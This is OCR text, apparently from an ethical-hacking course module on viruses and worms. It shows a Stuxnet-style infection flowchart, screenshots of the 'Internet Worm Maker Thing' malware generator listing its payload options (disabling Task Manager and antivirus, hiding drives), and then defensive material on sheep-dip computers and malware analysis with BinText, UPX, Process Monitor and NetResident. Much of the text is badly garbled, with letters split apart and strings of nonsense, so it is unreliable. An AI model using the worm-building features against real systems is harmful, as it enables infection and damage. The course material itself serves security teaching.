TRACE" in t h e f o l l o w i n g r e g is t r y key:
H K E Y _ L O C A L _ M A C H I N E S O F T W A R E M i c r o s o f t W i n d o w s C u r r e n t V e r s i o n M S - D O S E m u la tio n
( C o n t ’d )
Error

>‫־־‬

Inject in Step7
& call export 32

Inject in service,
call export 32

C
heck C G
F

A..........
Equal

< r~

R key NTVDM
eg
Trace=19790529

Infects
Step 7
projects

Create
global m
utexes

Past deadline

<----- Date<06/24/2012
^

: H
ides
: m
alicious
:
files

D ate OK

C
heck O
S
XP o r less

Create rootkit
service reg keys

■

Inject in Step7 &
call export 32

V ista o r h ig h e r

V
Set D C
AL

y
Set S C
AL

V
Set file tim
es

.......
V
Create global m
utex
r>

V

E
xit

---------- A
Oem
7a.pnf

C r e a te .p n f &

Decrypt reso urce 201
& 242 & w rite to disk

Rootkit files

.cfgfiles
j . File OK

Date<06/24/2012

Decrypt & load se lf
fro m d isk. Call export
6 - get versio n

Com pare running
ve rsio n n u m b eran d
versio n on disk

FIGURE 7.23: Infection routine Flow



Viruses and W orm s


-

Worm Maker: Internet Worm
Maker Thing
Internet Worm Maker Thing

C EH

Version 4.00: Public Edition

IWTFRNFT WORM MAKFR THING V4

Pyos
olod:
le je s
C Avte aodO a
c a Pyas n te f C n ltvose
ti l D

0 M V
0 M Y
f~ Ccc ytc!Rrr
tsbSsfl ea
se
I Dfc:WcnSaty r Cre‫גמז‬Tx
ral tars eri
f
hg2 0 et
a
O
R
s fe‫ז וגוז‬Sary
a
C Rdm cvteaod UTsalto'WSrprBowic ‫־‬te
a oly ti a »>as I- Db 1 0en
n A
I LoSn
- opo d
u
CnefativT py0d: I- Db Mo cn
h co c ar 3(3s V s fc 5 Saty
a
o
o c
r r eec p
tdDdto
1|
IN
CAC
HNE
r D tditR u iC a nn d
r Dsabte Sh_:d:vwn
1 RmeMwre
- DM aa
tsoe l
av
1 HdrAI Drives
“
WI dS[ ]N e
nueC o
tc
e
I” Db L3
s te0“
s 0
r Dsabte Task Manager
1 Heacewtoos
- 3 fl otcicdw
eFV nn
O tp P th
u ut a :
I- DkW W
; nfcMIWeb
P Osobfc Keybord
r ‫ כ*ז‬Search Corcard
n C rru tA tiv s
o p n iru
r 5 r uB o
‫©׳®״‬x -nrt
r C pTE Spo r BsabteMDuse
o leoX upr
m E t
r—ChangeC puter
om
1 CptrWaw
“
P M3 a e 0
e 3 g Bx
U:
R
L
Sralr Oios
cedg p n
t
Tifle:
Srtjp
ta :
M5e‫*׳‬rt
.te0»
r‫ ־‬Cne hecn
h gC Io
a v
f‫ ־‬C
~ hangFETilrBar'
F GaRg ySrtu
lo l «tb ta p
b
n * *I*
C.EZ O D»:
UX.K: ‫׳‬d*
Text
r LciRcfr Srt-p
oo cov ta
Patv
|CVdwJ1 |1
:>n0:Y
0
r WgnhlMk
n oS o
to e c
Icon:
Ado otetMu“1
dTCnx e
n
r SrtASrc
ta #e e
v
f~Cag W eatoeTt I---------hne n A* yr » r Otletr o f flkler
M
r Cn■o*T t
h ?Cd tu
a
tab
r rngk! 'itjr t14
>
r < «mnS rtu
S1 a ta p
f~ S S p
‫ ־‬ot***' tam

r * n Sr p
«(h ta
tu
I” Ita n to p
la Srtj

r DU Rsd
e lc cct
a

f O « P1 r>1.««»
n !:lr »ia » ••
r Chaw Reo Owner
Owner:

I ----------

Tw (M*001flf»)i
it a

f“ OoenCdOrtves
Lock Worktlattn
P Do*‫׳‬tood file M3r«’ |

P Cac Wtoc
hne a pr
fe«10rlIU:

U:
R
L

I
----------r !‫י‬r ‫ _ ״‬J
•‫ ו‬m
‫י‬
?

l~ Kba Do
e or Ik
y d

I Be ce O
- luSr mf
tncoOo:
fett n p r
Be
r In cBtFs
fet a ie
I In c‫־‬sPs
” fetA ie
I WtVcRs
- e o fc
c
Etrs
xa:
r He rsle
idWfi s
u

IfY Ikd hPgmee
o e Tar r Ptw
u
oa i

/isl ‫י׳ -וי־‬
M u mfulhr^lnoi. oi
tp://x< «tra

IfY K nA rqA uV
o ro i^lH b t 0
u
o 5

PHdrr tt-lp5«t1 tih
tcTinc AuwT»
i Pl.yn (S
Purr: I Ry

R *W). ‫<.־‬k
‫״‬
n n«

p

C n l P tw
o tro « l

PA TFvrte
d oao s
d i

r C a g R gO sn b n
h n e e rg sa o

r

CRIMor*•*‫׳‬

OfQansator!:

r

Owncer*<

PEcte a atfe
x u DW d
e
a


W o rm M a k e r: In te rn e t W o rm M a k e r T h in g
In te rn e t W o rm

M a k e r T h in g is a t o o l s p e c ific a lly d e s ig n e d f o r g e n e r a t in g a w o r m .

T he se g e n e r a t e d I n t e r n e t w o r m s t r y t o s p re a d o v e r n e t w o r k s t h a t a re b a s ic a lly p re s e t in vasio n
p ro xy a tta c k s t h a t t a r g e t t h e host te c h n ic a lly , p o is o n it, a n d m a k e a base a n d p la n s t o la u n c h
t h e a t t a c k in f u t u r e . T h e w o r m s w o r k i n d e p e n d e n t l y . A n I n t e r n e t w o r m se nd s c o p ie s o f i t s e lf via
v u ln e r a b l e c o m p u t e r s o n t h e I n t e r n e t .



Viruses and W orm s


Internet Worm Maker Thing

Vernon

4.00:• Public Edition

INTERNET W
ORMM
AKFR THING V
4

r^

d
w

'

B m ‫ו‬
O

CfcMWf -n rd iii i S w i h f

‫ -ן‬Owng■ N 0 0 » T««t

Om M» Norton Saa**y

ng*•

j w + t M **1rtan Scr** > 0d r Q

F

A*vMadau<(ue

r RxSOMnorou•!

1 1 r
— —
r* *■ I S J
Y oa

r **KtlMNn

I --------r la‫־‬pS«Lrt

r Whcttor*•

r

EM
UM

r

r 1acj1iU .l1
9u
r

M r lM t tr a a

K * kwlx

r D aFte
am
r

M>a‫׳‬a.*-

T ( r * * Stork•

r C a g O Ic n
h n e ft* o
D ll E1E. ICO.

to * »

r M dH C aranrlM n

r

OwttCMTDi

r
»* < Jtt.
•<>

‫ מ‬fou L*cd Tho
P f Ob

V t|f» Q AtXfcif A S

_

r

r

Urrto«*D«ea

r

T MMnSUrtk•

CualooiCadt

* a y t t » t Haunq A PVjgr p —

S p a n * Stork•

r Nndtnvks

r

rm ^ u l d w i ).

r fim
wiUart•
r

0

C ‫״‬n * « AnM nj*

(i

*H ggvM H

r

r i« * i»nr

p Chr 9 1 C«M 1 >
Pwl

r
Q BM D a g n ! S

S r * K tr t« r t o

r omaetFrfil ' I

r Cw^T«e*s>«DB1‫׳‬

r

n o t M in e

C C u k iU r t

O In U > H N M a

O
ueut*a»:

r

Add To F*«nte»

te n rid W im

CRiNarar

r Ogm
trn tT m

FIGURE 7.24: Internet Worm Maker Thing



Viruses and W orm s


M o d u le F lo w

C EH

V iru s and
W orm s
C on cep ts

Types o f
V iruses

C o m p uter
W orm s

P en etratio n
Testing

C ounter•
m easures

M o d u le F lo w
—

M a l w a r e a na lysis is d e f i n e d as t h e a c tio n o f t a k i n g m a l w a r e s e p a r a t e ly a p a r t f o r

s t u d y i n g it. It is u s u a lly p e r f o r m e d f o r v a r io u s r e a s o n s such as f o r f i n d i n g t h e v u l n e r a b i l i t i e s
t h a t a re e x p l o i t e d f o r s p r e a d in g t h e m a l w a r e , t h e i n f o r m a t i o n t h a t w a s s to le n , a n d p r e v e n t i o n
t e c h n i q u e s t o be ta k e n a g a in s t it f r o m e n t e r i n g t h e s y s te m o r n e t w o r k in f u t u r e .

, 4‫, י‬
V iru s and W o rm s C o nc e p t

^ •

.'V

M a l w a r e A n a ly s is


T yp es o f V iruses

•4

—
v‫— ׳‬

s


^


D e t a ile d i n f o r m a t i o n a b o u t t h e m a l w a r e a na ly sis p r o c e d u r e is e x p la in e d in t h e n e x t f e w slides.



Viruses and W orm s


What is Sheep Dip Computer?

C EH

(crtifwd 1 tthKjl IlMkM

Sheep dipping refers to the analysis of suspect files, incoming m
essages, etc. for malware
A sheep dip computer is installed with port monitors, file monitors, network monitors and
antivirus software and connects to a network only under strictly controlled conditions

Run user, group
permission and process
monitors

Run device driver and
file monitors

Run port and
network monitors

Run registry and
kernel monitors


W h a t Is a S h e e p D ip C o m p u te r ?
—

S h ee p d ip p i n g r e fe r s t o t h e a n a ly s is o f s u s p e c t file s , i n c o m i n g m essa ge s, e tc . f o r

m a lw a re .
T his " s h e e p d i p p e d " c o m p u t e r is is o la te d f r o m o t h e r c o m p u t e r s o n t h e n e t w o r k t o b lo c k a n y
v iru s e s f r o m

e n te rin g th e

s y s te m .

B e fo r e t h i s p r o c e d u r e

is c a rr ie d

o u t, any d o w n lo a d e d

p r o g r a m s a re sa ved o n e x t e r n a l m e d ia such as C D -R O M s o r f l o p p y d is k e t t e s .
A s h e e p d ip c o m p u t e r is in s ta lle d w i t h p o r t m o n i t o r s , file s m o n it o r s , n e t w o r k m o n it o r s , a nd
a n t i v i r u s s o f t w a r e a n d c o n n e c ts t o a n e t w o r k o n l y u n d e r s t r i c t l y c o n t r o l l e d c o n d i t i o n s .
A s h e e p d ip c o m p u t e r :
0

Runs p o r t a n d n e t w o r k m o n i t o r s

0

Runs user, g r o u p p e r m is s io n , a n d p ro c e s s m o n i t o r s

0

Runs d e v ic e d r i v e r a n d f i l e m o n i t o r s

0

Runs r e g is t r y a n d k e r n e l m o n i t o r s



Viruses and W orm s


Anti-Virus Sensors System s
B

CEH

Anti-virus system is a collection of computer software that detects and analyzes malicious code
threats such as viruses, worms, and Trojans. They are used a long with sheep dip computers

Netw ork

if

Anti-Virus System

a * .....□
System 1

Anti-Virus

Anti-Spyware

Anti-Trojan

System 2

Anti-Spamware

Allowed
Traffic

a

Reflected
**► Traffic

Internet

System 3

EE

Anti-Phishing

Email-Scanner


A n tiv iru s S en so r S y s te m s
A n a n t i v i r u s s y s te m is a c o ll e c t i o n o f c o m p u t e r s o f t w a r e t h a t d e t e c t s a n d a n a ly ze s
v a r io u s m a l i c io u s c o d e t h r e a t s such as v iru s e s , w o r m s , a n d T ro ja n s . T h e y a re u sed a lo n g w i t h
s h e e p d ip c o m p u t e r s .

Network

B
S y s te m

Anti-Virus System

..... H
1

S y s te m

‫►י‬

2

Anti Virus

Anti Spyware

•

Reflected
Traffic

1
Allowed
Traffic

U

M

Anti Trojan

Allowed
Traffic

Anti Spamware

System 3

**
Reflected
* * > Traffic

Internet

m
Anti-Phishing

Email-Scanner

FIGURE 7 .2 5 : W o rk in g o f A n tiv iru s S enso r S ystem s



Viruses and W orm s


A n a n t i v i r u s s y s te m in c lu d e s a n t iv ir u s , a n t i - s p y w a r e , a n t i- T r o ja n , a n t i - s p a m w a r e , a n ti- P h is h in g ,
an e m a il s c a n n e r , a n d so o n . U su a lly, it is p la c e d in b e t w e e n t h e n e t w o r k a n d I n t e r n e t . It a llo w s
o n l y g e n u i n e t r a f f i c t o f l o w t h r o u g h t h e n e t w o r k a n d b lo c k s m a l i c io u s t r a f f i c f r o m e n t e r i n g . As
a re s u lt, it e n s u re s n e t w o r k s e c u r it y .



Viruses and W orm s


M alware A nalysis Procedure:
Preparing Testbed
Isolate the systemfromthe
D
isable the 'shared
network by ensuring that the
folders', and the'guest
NIC card is in "host only" m
ode isolation'

C EH

Copy the malware
over to the guest O
S

* ‫ר‬

‫■אי‬

fc c a

‫׳‬
0
Install guest OS into the
Virtual PC/ VMWare

Install VMWare or Virtual
PC on the system

M a lw a re A n a ly sis P ro c e d u re : P re p a r in g T e s tb e d
M a l w a r e a na lys is p r o v id e s in - d e p t h
i d e n t if ie s e m e r g i n g te c h n ic a l t r e n d s f r o m

u n d e r s t a n d i n g o f e a ch in d iv id u a l s a m p le a nd

th e

la rg e c o lle c t io n s

o f m a lw a re

s a m p le s . T h e

s a m p le s o f m a l w a r e a re m o s t l y c o m p a t i b l e w i t h t h e W i n d o w s b i n a r y e x e c u t a b l e . M a l w a r e
a na lys is is c o n d u c t e d w i t h

a v a r i e t y o f goals. T h e f o l l o w i n g is t h e p r o c e d u r e f o r m a l w a r e

a na lys is p r e p a r i n g T e s tb e d :
0

In sta ll V M W a r e o r V i r t u a l PC o n t h e s y s te m

0

In sta ll g u e s t OS i n t o t h e V i r t u a l P C / V M W a r e

0

Is o la te t h e s y s te m f r o m t h e n e t w o r k b y e n s u r in g t h a t t h e NIC c a rd is in " h o s t o n l y "
mode

0

D isab le t h e s h a r e d f o l d e r s a n d t h e g u e s t i s o l a t i o n

0

C o p y t h e m a l w a r e o v e r t o t h e g u e s t OS



Viruses and W orm s


1. Perform static analysis when the malware is inactive
2. Collect information about:

0 String values found in the binary with the help of string extracting tools such as B
inText
e The packaging and com
pressing technique used with the help of com
pression and
decom
pression tools such as U X
P
UPX

B in Te x t
11■
- °
Swxeh | r,1*

| Htto |

P|?lO
«can [CU A nfc«lc1> «
1tnV dnw
D1klap1« u e>
<p
TiroUfcan 0109 me• T«41ia> 37310t* 0 1 1364G |
K

fbw
i

iM w
fp

A C OOOO O
OOOCM
A
' 1‫׳ י‬
1
A ‫ ויו‬i ll 1.V;
a ccoocaxcxc
A C O C O G7
C OO C 28
A C O O O G9
O O O C 2F
a ; ‫זץי;י;ווו;ווי‬

O C 3C
C D 000040
000030000110
O C 000228
C 03C
OC
C 03000Q
250
OC
C 03000G
278
O G 00029f
O 03G
O
CCC3C0013C

A :000000C0928 0C
0030001528
/. ‫ ׳‬m nvin: OC003000IA44
/. ‫ וו‬i i f :
‫י‬h
OC003000IA70
A XO O
XO CCE9C O C 001A
C 03C 3C
A 3C X O C C 0C
OO CC3
CC30001AC
8
A :O O O C E O 0C
O O OCF
0030001A
FO
a :coocaxtfiB O 003C
C 1001B
18

1 1 f~
0 TH

Administrator: C:Windowssystem32cmd.exe
D:sCEH T0013CEH v 8 Module 07 U lru s e s and W ornsNConpression
lUPXNupx306«#supx306t#>upx.exe
U ltim a t e P a c k e r f u r e X e c u ta b le s
Copyr i if 1 1. <C> 1996
1
2011
IPX 3.R*w
Markus O berliiinw r. L a s z lo M o ln ar 0. Jo h n Rr I
Usage: upx I ‫ ־‬I2 3 4 5 6 7 *9 d It Mil. 1 I- q u f k ]
-I
‫־‬d
-t
-h

dau

Qitbc

0 Z3
Mu
lsf“ c M1F aue ‫׳‬e rt
ro « 0 ©1 1 P iC
KEMIE132
G«norj|_RcpoMM
FIh To o o
OM
FtoToKoop

1-0 f i l e !

e im p ress f a s t e r
decom press
t * s t com pressed f 11•
g i v • n o r • h e lp

-<
j
- o F IL k
~f
-k
F ile ..

com prass b u t t e r
l i s t ronppRssRd f i l e
d is p la y u r n ion imnb•
d is p la y t o f t w M lie •

It• q u l* t
w r i t • o u tp u t t o ' P I L k '
f o r c e c o n p ro s c io n
o f o u a p ic io u o I
kocp backup f i l o •
e x e c u ta b le s to <de>conpre3a

L wolw
o nF

lyp e

inm

JPX con es w it h ABSOLUTELY NO WARRANTY; f o r

R*pcrtnaFlw

P ile ..

*up* - - h e lp ' f o r n ore d e t a ile d h e lp .

h ttp://www. mcafee.com

s i t h t tp :/ '/ u p x .3 f .

h ttp://upx.sourceforge.net
Copyright © by EG-Goilicil. All Rights Reserved. Reproduction is Strictly Prohibited

M a lw a re A n a ly sis P ro c e d u re
S te p 1: P e r f o r m s ta tic a n a ly sis w h e n t h e m a l w a r e is in a c tiv e
S te p 2: C o lle c t i n f o r m a t i o n a b o u t :
Q

S trin g v a lu e s f o u n d in t h e b in a r y w i t h t h e h e lp o f s tr in g e x t r a c t i n g t o o l s such as B in T e x t

Q

T h e p a c k a g in g a n d c o m p r e s s i n g t e c h n i q u e

u sed w i t h t h e h e lp o f c o m p r e s s i o n a nd

d e c o m p r e s s i o n t o o l s such as UPX

BinText
S o u rc e : h t t p : / / w w w . m c a f e e . c o m
B in T e x t can e x t r a c t t e x t f r o m a n y k in d o f file a n d in c lu d e s t h e a b i l it y t o f i n d p la in ASCII t e x t ,
U n ic o d e ( d o u b l e b y te ANSI) t e x t , a n d r e s o u r c e s trin g s , p r o v id i n g u s e fu l i n f o r m a t i o n f o r e ach
it e m in t h e o p t i o n a l " a d v a n c e d " v i e w m o d e .



Viruses and W orm s


_

BinText 3.0.3

‫ם‬

Search | Filter | Help |

F (0s a |C:Ms rs d n tra rN e k p s tipe e
ile c n
J e ’A mts to D s to V e x
I? A van v w
d ced ie
F ps
ile o
A 00000000004D
A 000000000110
A 000000000228
A 000000000250
A 000000000278
A 00000000029F
A 0 0 000006B
00
E
A 00000000090C
A 000000000928
A OOO O O4
OOOOE4
A 000000000E
70
A O OOOO9
OOOOEC
A OOOOOC
OOOOE8
A 000000000E 0
F
A 000000000F
18
a n n n n nnnnnF 44
< [
III

Ra y
ed

M mp s
e o
I©
00003000004D 0
000030000110 0
000030000228 0
000030000250 0
000030000278 0
00003000029F 0
0000300012 E 0
B
0000300015 C 0
0
000030001528 0
000030001A
44 0
000030001A
70 0
000030001A C 0
9
000030001A 8 0
C
000030001A 0 0
F
000030001818 0
nnnrtw 44 n
n1R

B we
ro s

£0

Tim taken:0.109 s c Te t s e 37340b te (36.4 K
e
e s x iz :
y s 6)
A
f Tx
et
!T isp g mc n o b ru inD Smd
h ro ra a n t e n O o e
u
R
icheW
l
te t
x
d ta
a
rsc
»
0 re c
(o
0M u
Z3
Is ro e s c e tu P s n
P c s o F a re re e t
K R E 32
ENL
G n ra p N m
e e l.A p a e
G n talR
e e eportee
F s o e te
te T D le
F so ep
ie T K e
LgnF g
o g g la s
R p n g la s
e c tn F g
V
llin m w

.

A : 1840
N

U 373
N

R:0
S

h

j

find | S |
ave

FIGURE 7.26: Bintext Screenshot

U PX
S o u rc e : h t t p : / / u p x . s o u r c e f o r g e . n e t
UPX a c h ie v e s an e x c e l l e n t c o m p r e s s i o n r a t i o a n d o f f e r s v e r y f a s t d e c o m p r e s s i o n . It t y p i c a l l y
c o m p r e s s e s b e t t e r t h a n W i n Z ip / z i p / g z i p .
3S

Administrator: C:Windowssystem32cmd.exe

D :C E H -T o o ls C E H v 8 M o du le 0 7 U ir u s e s and WormsC o m p re s s io n and D ecom press
lU P X u p x 3 0 8 w u p x 3 0 8 w > u p x .e x e
U l t i m a t e P acket* f o r e X e c u ta b le s
C o p y r ig h t <C> 19 9 6 - 2011
JPX 3 .0 8 w
M arku s O b e rh u m e r, L a s z lo M o ln a r & John R e is e r
Dec 1 2 t h
U sag e: upx

[ 1 2 3 4 5 6 7 8 9 ‫ ־‬d l t h UL ]

l-q v fk ]

1 -0 f i l e ]

Commands:
-1
com press f a s t e r
-d
decom press
-t
t e s t co m p re ssed f i l e
-h
g i v e more h e lp
O p tio n s :
-q
be q u i e t
- 0 F IL E w r i t e o u tp u t to ' F I L E '
-f
f o r c e c o m p re s s io n o f s u s p ic io u s
-k
k e e p b a cku p f i l e s
F ile ..
e x e c u t a b le s t o < de>com press
ry p e

'u p x — h e l p '

f o r more d e t a i l e d

file ..

-9
1‫־‬
-U
-L

com press b e t t e r
l i s t co m p re ssed
d is p la y v e rs io n
d is p la y s o ftw a re

-w

be v e rb o s e

file
num ber
lic e n s e

file s

h e lp .

JPX comes w it h ABSOLUTELY NO WARRANTY; f o r d e t a i l s

v is it

h ttp : //u p x .s f .n e

D :C E H -T o o ls C E H v 8 M o du le 0 7 U ir u s e s and WormsC o m p re s s io n and D ecom press
lU P X u p x 3 0 8 w u p x 3 0 8 w >

FIGURE 7 .2 7 : UPX W o rk in g in C o m m a n d P ro m p t



Viruses and W orm s



CEH

U1w ilh l lU M
r f 4 iu t
t
b

( C o n t’d )

Run the virus and monitor the process
actions and system information with
the help of process monitoring tools
such as Process Monitor and Process
Explorer

3. Set up network connection and
check that it is not giving any errors

r > tn
o

a

L il‫ ״‬J

Process Monitor - Sysinternals: www.sysinternals.com
File

Edit

Event

Filter

Tools

Options

U I
Time of Day Process Name

P ro ce ss
M o n ito r

Help

‫]י‬
PID Operation
2384
CreateFieMapp
2384 ^ CloseW
e
CreateFie
ReadFie
ReadFile
ReadFie
,TCP Receive
,TCP Send
ReadFie
ReadFie
ReadFie
ReadFie

Showing 89,723 of 186,768 events (43°: .1

Path

Resut

C WndowsSystem32'wnageres <*
SUCCESS
C WindowsSysten132Nw1ageres dl
SUCCESS
C LbersAdmostrator^pp DataLocal... SUCCES S
C Window«Mcro*oft NETXFramework... SUCCESS
C XWindowsXMcrosoft NETXFramework... SUCCESS
CWindow3fAcT0soft.NETXFramework... SUCCESS
WIN-MSSELCK4K41 1056 •>WIN-MSS... SUCCESS
WIN-MSSELCK4K41:1055 •> WIN-MSS. SUCCESS
CWindows H cro soft. NETXFramevvork.. SUCCESS

Detail

SyncType SyncTy

Desw Access: S
ed
Offset: 7.623.168.
Offset: 7.557.632.
Offset: 7.574.016...
Length 1. seqnum
Length 1. startime
Offset: 9.322.496.
CXWindowsXAAcrosoft NETXFramework ..SUCCESS Offset: 9.547.776.
C XWindowsXMcrosoft NETXFramework... SUCCESS Offset: 9.535.483.
CXWindowsXfAcrosoft.NETXFramewoik... SUCCESS Offset: 7.803.392.

Backed by virtual memory

http://technet.m icrosoft.com
Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited

M a l w a r e A n a l y s i s P r o c e d u r e ( C o n t ’d)
S te p 3: Set u p n e t w o r k c o n n e c t i o n a n d c h e c k t h a t it is n o t g iv in g a n y e r r o r s
S te p 4: Run t h e v ir u s a n d m o n i t o r t h e p ro c e s s a c tio n s a n d s y s te m i n f o r m a t i o n w i t h t h e h e lp o f
p ro c e s s m o n i t o r i n g t o o l s such as P ro ces s M o n i t o r a n d P ro ces s E x p l o r e r

m

Process M onitor

.
l^_

S o u rc e : h t t p : / / t e c h n e t . m i c r o s o f t . c o m

Process M o n i t o r is an a d v a n c e d m o n i t o r i n g t o o l f o r W i n d o w s t h a t s h o w s r e a l- t i m e file s y s te m ,
r e g is try , a n d p r o c e s s / t h r e a d a c tiv it y .



Viruses and W orm s


Process Monitor - Sysinternals: www.sysinternals.com

F E it E
ile d
vent Filter Tools O
ptions H
elp
Time of Day Process Name
12:13:46.620...
Explorer EXE
12:13:46.620... ^ ExplorerEXE
12:13:46.621. .. ^Explorer.EXE
12:13:46.676... Bmmc.exe
12:13:46.677... j a mmc.exe
12:13:46.679... Smmc.exe
12:13:46 685 .ttfirefox.exe
12:13:46 685. (Jfirefox.exe2760
12:13:46.687... jqimmc.exe4100
12:13:46.694... ■Btmmcexe
12:13:46.695... jgjmmc.exe
12:13:46.696... ^mmc.exe
n

n

1 r r i v ___ i i n n

T3 n

PID Operation
2384 2k Create FileMapp.
2384 ;rk Close File
2384 ;A Create File
4100 9k Read File
4100 2k Read File
4100 2k Read File
2760 s*VTCP Receive
TCP Send
Read File
4100 y k Read File
4100 2 k Read File
4100 irk Read File

ir i

Showing 89,723 of 186,768 events (48%)

Path
Result
Detail
C:WindowsSystem32imageres.dllSUCCESS SyncType: SyncTy..
C:W1ndowsSystem32imageres.dll
SUCCESS
C:UsersAdministratorAppDataLocal...SUCCESS Desired Access: S...
C:W1ndows.Microsoft NET.Framework ...SUCCESS Offset:7,623,168,..
C:WindowsMicrosoftNETFramework.SUCCESS Offset:7,557,632,...
C:WindowsMicrosoft.NETFramework... SUCCESS Offset:7,574,016,..
WIN-MSSELCK4K41:1056->WIN-MSS...SUCCESS Length: 1. seqnum:.
WIN-MSSELCK4K41:1055 ‫>־‬WIN-MSS...SUCCESS Length: 1. startime:..
C:WindowsMicrosoft. NET•‫.׳‬Framework... SUCCESS Offset:9,322,496,..
C:WindowsMicrosoft.NETFramework... SUCCESS Offset:9,547.776,...
C:WindowsMicrosoft.NETFramework... SUCCESS Offset:9,535.488...
C:WindowsMicrosoft.NETFramework... SUCCESS Offset:7,803,392,..
n u t __ 1____ 1 1 1

n u r n r

1

n 1r v ? c g 1 r _ a g _ !
_

T m i i n ___

Backed by virtual memory

FIGURE 7.28: Process Monitor Screenshot



Viruses and W orm s


( C o n t’d )

( ^H
|

( r i W t h u Nm I(
•tfd t. l
w

N etR esident
5. Record network traffic
information using the
connectivity and log packet
content monitoring tools such
as NetResident and TCPView

6. Determine the files added,

He sear* ve* Evens rods -ep
AlDafe |

Cr04>5 *

F te ■

■ :.dre3‫־‬

&0-p£

■>*aJ-ess j

OM

Date
KV5/2012 2::.
1
36 ■ !(VS/2012 2:1..
:0/5/2012 2:1
1
36 - 10/5/2012 2:1..
1 - 10/5/2012 2:1..
20
10/5/20122:1
- 10/5/2012 2:1..
10/5/2012 2:1
- 10/5/2012 2:1
10/5/2012 2:1..
10/5/3012 2:1
- 10/5/2012 2:1..
:0/5.'I012 2:1
- 10/5/2012 2:1

= E “
1Q/V2012
S
siotoefc
0 « '‫* ״‬
ffl 0 i £ *artyA
S 0
*art* B

processes spawned, and
changes to the registry with
the help of registry monitoring
tools such as RegShot

S3ve ‫^ • י‬

Dees

LastLpdated
:0/5/3012 2:14:3.
10/5/20122:1^:4..
10/5/2012 2:14:4.
10/5/2012 2:14:4.
10/5/2012 2:14:4..
10/5/2012 2:14:5.
10/5/20122:14:5..
10/5/2012 2:14:5.
10/5/3012 2:14:5.
10/5/2012 2:14:5..
10/5/2012 2:14:5.
10/5/2012 2:14:5.
10/5/3012 3:15:0.
10/5/3012 3: t5:2.

V j Event Octal
=totocd
^,W e b
■W Web
Web
Web
web
,y, Web
^ Web
^ Web
^ Web
^ web
y / Web
•W Web
^ w«b
W
teb

Party A
I Pot! A
W -UUQN3...
W
1076
VV1N-IXQ
N3...
1104
WIH-LXQN3...
1109
WW-IXQN3
1110
W
1H-LXQN3...
1111
W
1N-LXQ
N3
1114
1114
W
1H1XQN3...
V1N-LXCN3
1145
VV1N 3N
-IW 3
1147
WIN-LXQN3...
1163
W
1N-LXQN3...
1114
W1N-UQN3...
1164
W
1N4.XQN3...
1076
W
1N-IXQN3
1205

5
arty B
mystart-bni...
m5003sM-n...
maa03s&4-n...
maa03s04-n...
ra303s:4*v..
maa03eD4-n...
nos03»M-n...
rnaa03st>4-n...
nao03*&4-n...
nas03«:4‫־‬n...
‫...ת-4 3 (**ח ו‬
»&
moo03*04-n...
mvctrt‫*־‬xU...
™■0‫...ז«-40.ר‬

Po‫:׳‬B
80
443
*43
•*43
443
90 —1
80
80
443
443
B
C
80
8
C
80

rvralDH^
T O ...•

POS1 r q e tt h t e / e t ate-aun/ncws/xhr/rhc/MtlMMcr1
e u s 0 t p / n w 400
‫־‬
Tng

Vl4
au»

CM

52777990230736.52777991632076.52777992527295.5277798-180851-1.52777983170746 52777984394614

a
h ttp ://w w w . tamos, com


S te p 5: R eco rd n e t w o r k t r a f f i c i n f o r m a t i o n u s in g c o n n e c t i v i t y a n d lo g p a c k e t c o n t e n t
m o n i t o r i n g t o o l s such as N e t R e s i d e n t a n d T C P V ie w
S te p 6: D e t e r m i n e t h e file s a d d e d , p ro c e sse s s p a w n e d , a n d c h a n g e s t o t h e r e g is t r y w i t h th e
h e lp o f r e g is t r y m o n i t o r i n g t o o l s such as R e g S h o t

NetResident
‫—״‬

S o u rc e : h t t p : / / w w w . t a m o s . c o m

N e t R e s id e n t

is a n e t w o r k

c o n te n t

a n a ly s is

a p p lic a tio n

d e s ig n e d

to

m o n ito r,

s to r e ,

a nd

r e c o n s t r u c t a w i d e r a n g e o f n e t w o r k e v e n ts a n d a c tiv it ie s , such as e m a il m essa ge s, w e b pages,
d o w n l o a d e d file s, i n s t a n t m essages, a n d V o IP c o n v e r s a t i o n s . It uses a d v a n c e d m o n i t o r i n g
t e c h n o l o g y t o c a p t u r e t h e d a ta o n t h e n e t w o r k , saves t h e d a ta t o a d a ta b a s e , r e c o n s t r u c t s it,
a n d d is p la y s t h e c o n t e n t .



Viruses and W orm s


. n x

S NetResident - Evaluation Version
Fte Search View Events Tools Help
Al Data |
Events
' Groups *

Refresh | y

Groups

Fiter - I
Count

0

0 0 Dates
0 S 10/5/2012
H 0 ^ Protocols

0 4 * ) Web
1 0 2 Party A
B 0 ® PartyB

1
36
1
36
1
20

IP Address * | ,
Date
u 10/5/2012 2:1...
u 10/5/2012 2:1...
‫...1:2 2102/5/01 ם‬
a 10/5/2012 2: L..
10/5/2012 2:1...
a 10/5/2012 2:1...
Q 10/5/2012 2:1...
a 10/5/2012 2:1...
a 10/5/2012 2:1...
a 10/5/2012 2:1...
o 10/5/2012 2:1...
a 10/5/2012 2:1...
a 10/5/2012 2:1...
10/5/2012 2:1...

Save * ^

Delete |1^) Event Detail

Last Updated
10/5/2012 2:14:3..
10/5/2012 2:14:4..
10/5/2012 2:14:4..
10/5/2012 2:14:4..
10/5/2012 2:14:4..
10/5/2012 2:14:5..
10/5/2012 2:14:5..
10/5/2012 2:14:5..
10/5/2012 2:14:5..
10/5/2012 2:14:5..
10/5/2012 2:14:5..
10/5/2012 2:14:5..
10/5/2012 2:15:0..
10/5/2012 2:15:2..

| Protocol
^
^
^
^

Web
Web
Web
Web

^

Web
Web

8 IH
^ Web
Web
Web
^ Web

W Web
^
^

Web
Web

Party A

Port A

WIN-LXQN3...
WIN-LXQN3...
WIN-LXQN3...
WIN-LXQN3...
WIN-LXQN3...
WIN-LXQN3...
WIN-LXQN3...
WIN-LXQN3...
WIN-LXQN3...
WIN-LXQN3...
WIN-LXQN3...
WIN-LXQN3...
WIN-LXQN3...
WIN-LXQN3...

1076
1104
1109
1110
1111
1114
1114

U Party B
mystarHon.1...
maa03s04-«n...
maa03s04‫־‬in...
maa03s04-tn...
maa03s04-in...
maa03s04‫־‬in...
maa03s04-in...

1145
1147
1163
1114
1164
1076
1205

maa03s04-in...
maa03s04-in...
maa03s04-in...
maa03s04-in...
maa03s04-in...
mystart-ton.i...
maa03s04-in...

<1

Port B
80 ±
443
443
443
443
80 —
80
80
443
443
80
80
80

V

Iw t D d ii_________________________________________________
■S'

'

'• ) I

I I r j L^j ‫ ־‬More... *

POST req u e st to h ttp ://n ew s.g o o g !e.co .in /n ew s/x h r/rh c?au th u ser= 0
